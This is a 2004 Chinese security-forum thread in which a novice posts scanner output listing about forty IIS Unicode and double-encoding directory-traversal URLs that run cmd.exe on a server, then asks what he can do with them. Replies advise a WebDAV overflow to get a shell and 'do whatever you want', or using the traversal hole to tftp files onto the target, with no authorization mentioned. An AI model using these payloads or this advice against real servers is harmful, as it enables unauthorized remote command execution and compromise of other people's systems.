论坛: 菜鸟乐园 标题: 再次发IIS的很菜的问题!!望大家能帮我! 复制本贴地址    
作者: kekeweb [kekeweb]    论坛用户   登录

再次发IIS的很菜的问题!!望大家能帮我!我在网上看了相关的内容,可是自己就是不知道怎么去利用这些漏洞,利用这些漏洞能做什么,希望大家帮帮我!!谢谢!!



/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]

/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35%63../..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35c../..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%25%35%63../..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/..%255c../..%255c../..%255cwinnt/system32/cmd.exe?/c+dir [漏洞描述]

/msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/msadc/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir [漏洞描述]
/scripts/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c%20dir%20C:\ [漏洞描述]
/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir [漏洞描述]

可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞


插件类型: HTTP
插件成员名称: IIS漏洞
插件作者: glacier
插件版本: 1.4
风险等级: 高
漏洞描述: "安全焦点"漏洞搜索引擎 "安全焦点"漏洞利用程序搜索引擎



地主 发表时间: 04-04-12 13:02

回复: lhh2003 [lhh2003]   论坛用户   登录
用web溢出试试

B1层 发表时间: 04-04-12 13:06

回复: lijingxi [lijingxi]   见习版主   登录
找一��叫webdev的程序  溢出看看行不行

B2层 发表时间: 04-04-12 13:46

回复: kekeweb [kekeweb]   论坛用户   登录
不好意思,我希望你们能具体点给我解释,这样的漏洞我最终能做些什么呢??

B3层 发表时间: 04-04-12 14:33

回复: christie [christie]   论坛用户   登录
webdav益处,可以得到对方的SHELL。然后该干什么,就去干什么吧~

B4层 发表时间: 04-04-12 16:59

回复: chiru [chiru]   论坛用户   登录
何必溢出,既然有unicode漏洞,直接tftp东西就可以了嘛。方便快捷,实在是居家旅行必备良药。

B5层 发表时间: 04-04-12 19:17

回复: abctm [abctm]   版主   登录
这个年头还有这个漏洞,具体看看20cn的文档吧

B6层 发表时间: 04-04-12 22:32

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号